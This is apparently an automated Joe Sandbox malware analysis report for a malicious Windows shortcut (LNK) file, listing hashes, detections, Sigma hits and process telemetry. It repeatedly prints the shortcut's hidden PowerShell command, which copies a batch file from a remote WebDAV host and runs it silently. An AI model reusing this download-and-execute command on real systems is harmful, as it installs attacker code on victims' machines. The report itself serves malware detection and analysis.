Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dial2%20(2).Ink.lnk

Overview

General Information

Sample name:dial2%20(2).Ink.lnk
Analysis ID:1447087
MD5:45e87e98e99ea69c34b4636c8e085e16
SHA1:2a7ab675507ce0dcd0639f07bdacec2f3718b3d1
SHA256:fa39116396d122c184476400edd9c0995ad5c7a8976d6cfba95fa3cb258767dc
Tags:lnk
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", ProcessId: 1244, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden", ProcessId: 1244, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: dial2%20(2).Ink.lnkReversingLabs: Detection: 18%
Source: dial2%20(2).Ink.lnkVirustotal: Detection: 21%Perma Link
Machine Learning detection for sample
Source: dial2%20(2).Ink.lnkJoe Sandbox ML: detected
Source: Binary string: System.Management.Automation.pdbb/ source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 00000003.00000002.1326645552.000002202F58F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1326645552.000002202F4B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbhI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbEI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbe35N source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1303535300.00000220174B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1303535300.0000022018D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1323560124.000002202751E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1323560124.0000022027661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303535300.0000022018D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1303535300.0000022018CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: dial2%20(2).Ink.lnkString found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com
Source: dial2%20(2).Ink.lnkString found in binary or memory: https://pizza-practices-representative-country.trycloudflare.com.Z2

System Summary

barindex
Found URL in windows shortcut file (LNK)
Source: Initial fileStrings: https://pizza-practices-representative-country.trycloudflare.com.Z2SXT=
Source: classification engineClassification label: mal76.rans.winLNK@2/5@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nwmizi4.mvm.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: dial2%20(2).Ink.lnkReversingLabs: Detection: 18%
Source: dial2%20(2).Ink.lnkVirustotal: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdbb/ source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 00000003.00000002.1326645552.000002202F58F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1326645552.000002202F4B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbhI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: powershell.exe, 00000003.00000002.1326645552.000002202F51D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbEI source: powershell.exe, 00000003.00000002.1327920033.000002202F7A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbe35N source: powershell.exe, 00000003.00000002.1327920033.000002202F7FC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8883E09CD push E85DAB5Dh; ret 3_2_00007FF8883E09F9

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4633Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3478Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -3689348814741908s >= -30000sJump to behavior
